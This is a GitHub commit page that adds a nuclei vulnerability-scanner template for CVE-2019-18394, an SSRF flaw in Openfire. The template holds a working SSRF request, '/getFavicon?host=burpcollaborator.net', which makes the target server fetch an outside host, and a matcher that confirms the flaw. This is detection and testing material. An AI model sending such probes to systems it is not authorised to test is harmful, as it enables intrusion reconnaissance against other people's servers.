Skip to content

Commit 4abb268

Browse files
committed
1 parent e3ab093 commit 4abb268

File tree

1 file changed

+17
-0
lines changed

1 file changed

+17
-0
lines changed

cves/CVE-2019-18394.yaml

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
id: CVE-2019-18394
2+
3+
info:
4+
name: Openfire Full Read SSRF
5+
author: pdteam - nuclei.projectdiscovery.io
6+
severity: critical
7+
8+
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
9+
10+
requests:
11+
- method: GET
12+
path:
13+
- "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
14+
matchers:
15+
- type: word
16+
words:
17+
- <h1>Burp Collaborator Server</h1>

0 commit comments

Comments
 (0)